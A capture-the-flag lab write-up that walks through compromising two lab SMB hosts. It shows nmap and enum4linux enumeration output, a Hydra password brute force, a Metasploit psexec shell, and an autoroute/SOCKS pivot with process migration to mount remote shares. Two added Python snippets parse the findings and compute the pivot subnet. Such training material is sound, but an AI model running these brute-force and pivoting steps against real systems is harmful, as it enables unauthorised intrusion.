NetBIOS Hacking
Welcome to a new writeup from N1NJ10, this time on the NetBIOS Hacking lab.
We will learn to enumerate the SMB service and exploit it using different brute-forcing and exploitation tools. The lab also covers pivoting and how to use the net utility to mount shared drives in the pivot network.
Lab Environment
In this lab environment, the user accesses a Kali GUI instance. A vulnerable SMB service can be reached with the tools installed on Kali at http://demo.ine.local and http://demo1.ine.local
Objective: Exploit both targets and find the flags!
Tools
The best tools for this lab are:
- Metasploit Framework
- Nmap
- Hydra
- Proxychains
If you don't know what NetBIOS is, I advise you to read this article to understand what NetBIOS is and how we deal with this protocol.
Let’s start
As we see, we have two targets, http://demo.ine.local and http://demo1.ine.local. Can we reach them or not?
Well, we can reach only one of them, http://demo.ine.local; for the other one, http://demo1.ine.local, we can only resolve the IP address.
Let's focus on the first one, the one we can reach.
Nmap is a good way to start
nmap -Pn -p- -T4 --disable-arp-ping -n -sV -sT 10.5.25.62
We can see that ports 139 and 445 are open. Good news: now we know that this machine runs NetBIOS/SMB.
Let's enumerate the NetBIOS service with enum4linux (it runs without credentials):
enum4linux -a demo.ine.local
We can see the following result:
root@INE:~# enum4linux -a demo.ine.local
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 23 01:41:48 2023
==========================
| Target Information |
==========================
Target ........... demo.ine.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on demo.ine.local |
======================================================
[E] Can't find workgroup/domain
==============================================
| Nbtstat Information for demo.ine.local |
==============================================
Looking up status of 10.5.25.62
No reply from 10.5.25.62
=======================================
| Session Check on demo.ine.local |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server demo.ine.local allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
=============================================
| Getting domain SID for demo.ine.local |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
result was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on demo.ine.local |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for demo.ine.local from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for demo.ine.local from srvinfo:
DEMO.INE.LOCAL Wk Sv NT SNT
platform_id : 500
os version : 6.3
server type : 0x9003
===============================
| Users on demo.ine.local |
===============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x1 RID: 0x3f1 acb: 0x00000210 Account: admin Name: (null) Desc: (null)
index: 0x2 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x4 RID: 0x3f2 acb: 0x00000210 Account: root Name: (null) Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[admin] rid:[0x3f1]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[root] rid:[0x3f2]
===========================================
| Share Enumeration on demo.ine.local |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
do_connect: Connection to demo.ine.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
Downloads Disk
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
Public Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on demo.ine.local
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/ADMIN$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/C$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Documents Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Downloads Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/IPC$ Mapping: OK Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/print$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Public Mapping: DENIED, Listing: N/A
======================================================
| Password Policy Information for demo.ine.local |
======================================================
[+] Attaching to demo.ine.local using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:DEMO.INE.LOCAL)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] ATTACKDEFENSE
[+] Builtin
[+] Password Info for Domain: ATTACKDEFENSE
[+] Minimum password length: None
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
================================
| Groups on demo.ine.local |
================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
group:[Access Control Assistance Operators] rid:[0x243]
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[Cryptographic Operators] rid:[0x239]
group:[Distributed COM Users] rid:[0x232]
group:[Event Log Readers] rid:[0x23d]
group:[Guests] rid:[0x222]
group:[Hyper-V Administrators] rid:[0x242]
group:[IIS_IUSRS] rid:[0x238]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Log Users] rid:[0x22f]
group:[Performance Monitor Users] rid:[0x22e]
group:[Power Users] rid:[0x223]
group:[Print Operators] rid:[0x226]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[Remote Desktop Users] rid:[0x22b]
group:[Remote Management Users] rid:[0x244]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Performance Log Users' (RID: 559) has member: Could not connect to server 10.5.25.62
Group 'Performance Log Users' (RID: 559) has member: The username or password was not correct.
Group 'Performance Log Users' (RID: 559) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Event Log Readers' (RID: 573) has member: Could not connect to server 10.5.25.62
Group 'Event Log Readers' (RID: 573) has member: The username or password was not correct.
Group 'Event Log Readers' (RID: 573) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Access Control Assistance Operators' (RID: 579) has member: Could not connect to server 10.5.25.62
Group 'Access Control Assistance Operators' (RID: 579) has member: The username or password was not correct.
Group 'Access Control Assistance Operators' (RID: 579) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Replicator' (RID: 552) has member: Could not connect to server 10.5.25.62
Group 'Replicator' (RID: 552) has member: The username or password was not correct.
Group 'Replicator' (RID: 552) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Backup Operators' (RID: 551) has member: Could not connect to server 10.5.25.62
Group 'Backup Operators' (RID: 551) has member: The username or password was not correct.
Group 'Backup Operators' (RID: 551) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Remote Access Servers' (RID: 575) has member: Could not connect to server 10.5.25.62
Group 'RDS Remote Access Servers' (RID: 575) has member: The username or password was not correct.
Group 'RDS Remote Access Servers' (RID: 575) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Network Configuration Operators' (RID: 556) has member: Could not connect to server 10.5.25.62
Group 'Network Configuration Operators' (RID: 556) has member: The username or password was not correct.
Group 'Network Configuration Operators' (RID: 556) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Power Users' (RID: 547) has member: Could not connect to server 10.5.25.62
Group 'Power Users' (RID: 547) has member: The username or password was not correct.
Group 'Power Users' (RID: 547) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Hyper-V Administrators' (RID: 578) has member: Could not connect to server 10.5.25.62
Group 'Hyper-V Administrators' (RID: 578) has member: The username or password was not correct.
Group 'Hyper-V Administrators' (RID: 578) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Users' (RID: 545) has member: Could not connect to server 10.5.25.62
Group 'Users' (RID: 545) has member: The username or password was not correct.
Group 'Users' (RID: 545) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'IIS_IUSRS' (RID: 568) has member: Could not connect to server 10.5.25.62
Group 'IIS_IUSRS' (RID: 568) has member: The username or password was not correct.
Group 'IIS_IUSRS' (RID: 568) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Remote Desktop Users' (RID: 555) has member: Could not connect to server 10.5.25.62
Group 'Remote Desktop Users' (RID: 555) has member: The username or password was not correct.
Group 'Remote Desktop Users' (RID: 555) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Endpoint Servers' (RID: 576) has member: Could not connect to server 10.5.25.62
Group 'RDS Endpoint Servers' (RID: 576) has member: The username or password was not correct.
Group 'RDS Endpoint Servers' (RID: 576) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Guests' (RID: 546) has member: Could not connect to server 10.5.25.62
Group 'Guests' (RID: 546) has member: The username or password was not correct.
Group 'Guests' (RID: 546) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Management Servers' (RID: 577) has member: Could not connect to server 10.5.25.62
Group 'RDS Management Servers' (RID: 577) has member: The username or password was not correct.
Group 'RDS Management Servers' (RID: 577) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Distributed COM Users' (RID: 562) has member: Could not connect to server 10.5.25.62
Group 'Distributed COM Users' (RID: 562) has member: The username or password was not correct.
Group 'Distributed COM Users' (RID: 562) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Cryptographic Operators' (RID: 569) has member: Could not connect to server 10.5.25.62
Group 'Cryptographic Operators' (RID: 569) has member: The username or password was not correct.
Group 'Cryptographic Operators' (RID: 569) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Could not connect to server 10.5.25.62
Group 'Certificate Service DCOM Access' (RID: 574) has member: The username or password was not correct.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Print Operators' (RID: 550) has member: Could not connect to server 10.5.25.62
Group 'Print Operators' (RID: 550) has member: The username or password was not correct.
Group 'Print Operators' (RID: 550) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Administrators' (RID: 544) has member: Could not connect to server 10.5.25.62
Group 'Administrators' (RID: 544) has member: The username or password was not correct.
Group 'Administrators' (RID: 544) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Remote Management Users' (RID: 580) has member: Could not connect to server 10.5.25.62
Group 'Remote Management Users' (RID: 580) has member: The username or password was not correct.
Group 'Remote Management Users' (RID: 580) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Performance Monitor Users' (RID: 558) has member: Could not connect to server 10.5.25.62
Group 'Performance Monitor Users' (RID: 558) has member: The username or password was not correct.
Group 'Performance Monitor Users' (RID: 558) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting local groups:
group:[WinRMRemoteWMIUsers__] rid:[0x3e8]
[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: Could not connect to server 10.5.25.62
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: The username or password was not correct.
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
group:[None] rid:[0x201]
[+] Getting domain group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'None' (RID: 513) has member: Could not connect to server 10.5.25.62
Group 'None' (RID: 513) has member: The username or password was not correct.
Group 'None' (RID: 513) has member: Connection failed: NT_STATUS_LOGON_FAILURE
=========================================================================
| Users on demo.ine.local via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.
===============================================
| Getting printer info for demo.ine.local |
===============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sun Apr 23 01:42:11 2023
root@INE:~#
From the previous result we can see that we have the users [ Administrator, Guest, root, admin ]. We may have a null session here, because we can log in with no credentials and see the IPC$ share.
Note: if you don't know what a null session is or what IPC$ is, look here for more details.
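Reading a full enum4linux -a dump by eye is error-prone, so here is an added example (my own code, not part of the original writeup or of enum4linux) that parses the output above and reports the facts that matter on both sides of the engagement: whether an anonymous session was accepted, which shares mapped anonymously, the password-policy values, and the state of each account. The sample input is a trimmed excerpt of the output shown above; the acb bit values are the standard SAMR account-control flags that rpcclient prints.

```python
"""Triage an enum4linux -a run: extract the facts that matter and rate them."""
import re
from dataclasses import dataclass, field

# Trimmed excerpt of the enum4linux output shown above (page data, not constructed).
SAMPLE = """
[+] Server demo.ine.local allows sessions using username '', password ''
index: 0x1 RID: 0x3f1 acb: 0x00000210 Account: admin Name: (null) Desc: (null)
index: 0x2 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x4 RID: 0x3f2 acb: 0x00000210 Account: root Name: (null) Desc: (null)
//demo.ine.local/ADMIN$ Mapping: DENIED, Listing: N/A
//demo.ine.local/C$ Mapping: DENIED, Listing: N/A
//demo.ine.local/IPC$ Mapping: OK Listing: DENIED
//demo.ine.local/Public Mapping: DENIED, Listing: N/A
[+] Minimum password length: None
[+] Password Complexity Flags: 000000
[+] Account Lockout Threshold: None
[+] Locked Account Duration: 30 minutes
"""

# SAMR account-control bits (the "acb" field printed by rpcclient/enum4linux).
ACB_DISABLED = 0x0001   # account is disabled
ACB_PWNOTREQ = 0x0004   # no password required
ACB_PWNOEXP = 0x0200    # password never expires

USER_RE = re.compile(r"index: 0x[0-9a-f]+ RID: (0x[0-9a-f]+) acb: (0x[0-9a-f]+) Account: (\S+)")
SHARE_RE = re.compile(r"//\S+/(\S+)\s+Mapping: (\w+),?\s+Listing: (\S+)")
POLICY_RE = re.compile(r"\[\+\] (Minimum password length|Password Complexity Flags|"
                       r"Account Lockout Threshold|Locked Account Duration): (.+)")
NULL_SESSION_MARK = "allows sessions using username '', password ''"


@dataclass
class Account:
    name: str
    rid: int
    acb: int


@dataclass
class Report:
    null_session: bool = False
    accounts: list = field(default_factory=list)
    shares: dict = field(default_factory=dict)   # share name -> (mapping, listing)
    policy: dict = field(default_factory=dict)   # policy item -> printed value


def parse_enum4linux(text: str) -> Report:
    """Walk the tool output line by line and collect the structured facts."""
    rep = Report()
    for raw in text.splitlines():
        line = raw.strip()
        if NULL_SESSION_MARK in line:
            rep.null_session = True
        elif m := USER_RE.match(line):
            rep.accounts.append(Account(m.group(3), int(m.group(1), 16), int(m.group(2), 16)))
        elif m := SHARE_RE.match(line):
            rep.shares[m.group(1)] = (m.group(2), m.group(3))
        elif m := POLICY_RE.match(line):
            rep.policy[m.group(1)] = m.group(2).strip()
    return rep


def findings(rep: Report) -> list:
    """Turn the parsed facts into plain-language findings for the report."""
    out = []
    if rep.null_session:
        out.append("null session: the server accepts an anonymous SMB logon")
    for share, (mapping, listing) in rep.shares.items():
        if mapping == "OK":
            out.append(f"share {share} is mappable anonymously (listing: {listing})")
    if rep.policy.get("Account Lockout Threshold") == "None":
        out.append("no account lockout threshold: online password guessing is not throttled")
    if rep.policy.get("Minimum password length") in ("None", "0"):
        out.append("no minimum password length")
    flags = rep.policy.get("Password Complexity Flags")
    if flags is not None and flags.strip("0") == "":
        out.append("password complexity disabled")
    for acct in rep.accounts:
        if acct.acb & ACB_DISABLED:
            out.append(f"account {acct.name} (RID {acct.rid}) is disabled")
            continue
        if acct.rid == 500:
            out.append(f"built-in administrator (RID 500) is enabled under its default name {acct.name}")
        if acct.acb & ACB_PWNOTREQ:
            out.append(f"account {acct.name}: no password required")
        if acct.acb & ACB_PWNOEXP:
            out.append(f"account {acct.name}: password never expires")
    return out


if __name__ == "__main__":
    for item in findings(parse_enum4linux(SAMPLE)):
        print("-", item)
```

Run it as-is to see the findings for the lab host, or pipe a saved enum4linux log into parse_enum4linux. The same output that tells an attacker "no lockout, no complexity" tells the defender exactly which policy settings to fix first.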
Let's test this with the smbclient tool:
smbclient -L 10.5.30.121 (this is demo.ine.local)
Note: the machine crashed many times, so the IP may change between commands.
Bingo, we have a null session there. We only need valid credentials to use the psexec exploit and get C2 over the machine.
So we have usernames from enum4linux that we can brute force with. You can use an NSE script from Nmap or any other method, but I prefer hydra for this task (note that -L takes a username list and -P a password list):
hydra -L Users.txt -P < ANY_PASSWORD_LIST > smb://demo.ine.local
Bingo, we now have the administrator account.
Now we can run the psexec module.
Give it a run!!
Bingo, now we are in!!
But we are not done yet; we are just starting the second task.
We can't access demo1.ine.local from our machine. Let's see if we can access it from this victim machine.
Note: we can't ping by name, because this machine has DNS resolution disabled, so I used the IP I learned from the first ping above.
So this machine has another NIC on a private LAN that we can't reach directly. Let's check with ipconfig:
ipconfig
eth0 (Interface 12) is the NIC we want to reach, so we can add a route to it with the autoroute module from Metasploit:
run autoroute -s 10.5.27.211/20
Note: I use the /20 prefix because the netmask is 255.255.240.0; for more info, see here.
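To make the /20 choice concrete, here is an added example (my own code, not from the writeup or from Metasploit) that reads an ipconfig-style interface block, turns the address and subnet mask into the CIDR network the route has to cover, and checks whether the second target falls inside it. The ipconfig text is constructed: the interface address 10.5.20.7 is made up, while the mask 255.255.240.0 and the target 10.5.27.211 are the values the writeup uses.

```python
"""Derive the pivot route (CIDR) from an interface's IP and netmask."""
import ipaddress
import re

# Constructed ipconfig-style output for the pivot host's second NIC.
# The address is invented; the subnet mask is the one the writeup reports.
SAMPLE_IPCONFIG = """
Ethernet adapter eth0:
   IPv4 Address. . . . . . . . . . . : 10.5.20.7
   Subnet Mask . . . . . . . . . . . : 255.255.240.0
"""


def parse_interfaces(text: str) -> dict:
    """Return {adapter_name: (ipv4, netmask)} from Windows ipconfig-style text."""
    ifaces, current = {}, None
    for line in text.splitlines():
        if m := re.match(r"\S.*adapter (.+):", line):      # adapter header line
            current = m.group(1)
        elif current and (m := re.search(r"IPv4 Address.*: (\S+)", line)):
            ifaces.setdefault(current, [None, None])[0] = m.group(1)
        elif current and (m := re.search(r"Subnet Mask.*: (\S+)", line)):
            ifaces.setdefault(current, [None, None])[1] = m.group(1)
    return {name: tuple(pair) for name, pair in ifaces.items()}


def route_for(ip: str, mask: str) -> ipaddress.IPv4Network:
    """The network an interface belongs to; 255.255.240.0 collapses to a /20."""
    return ipaddress.ip_network(f"{ip}/{mask}", strict=False)


def reachable_via(net: ipaddress.IPv4Network, target: str) -> bool:
    """True if traffic to target would be carried by a route for net."""
    return ipaddress.ip_address(target) in net


if __name__ == "__main__":
    for name, (ip, mask) in parse_interfaces(SAMPLE_IPCONFIG).items():
        net = route_for(ip, mask)
        print(f"{name}: {ip}/{mask} -> route {net} (prefix /{net.prefixlen})")
        print("  covers 10.5.27.211:", reachable_via(net, "10.5.27.211"))
```

The same network object answers the defender's question in reverse: any host in 10.5.16.0/20 becomes reachable once a route through the compromised machine exists, which is the scope that network segmentation between those two subnets is meant to limit.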
Now we can reach this network from Metasploit only, but I want to reach it from my normal terminal.
So I used the SOCKS proxy server module from Metasploit.
Note: you must know which port your proxychains configuration points at; you can check it with this command:
tail -n 5 ../../etc/proxychains4.conf
Now we are ready to start the SOCKS proxy server module.
Good, now we can do whatever we want from our machine to demo1.ine.local through the proxy server.
Let's scan it:
proxychains nmap -sT -Pn -sV --disable-arp-ping -T4 -n demo1.ine.local
It has port 445 open; that means it runs NetBIOS/SMB too.
Now it is time to grab our flags.
I started searching for the first flag on the first victim machine (demo.ine.local) and found it in the Documents directory.
Let's see what is on the second one with the net view command:
net view 10.5.27.211
We received "Access is denied" even though we are root, which means we probably need to migrate.
So I decided to migrate into the explorer.exe process.
Note: if you don't know what process migration is, why I chose explorer.exe, or what it is, read this.
migrate -N explorer.exe
Let's see if we can use net view now.
We can use the net view command now, and we see the Documents and K shares. Let's see what disks exist on this machine with diskpart:
diskpart
list disk
OK, we have one disk named Disk0. We can mount the two shares over NetBIOS with net use:
net use <drive_letter>: \\<IP>\<share_you_want_to_mount>
Now we have them; I found the second flag in the D drive (Documents).
I enjoyed the lab, and I will post more labs and other security material in the future.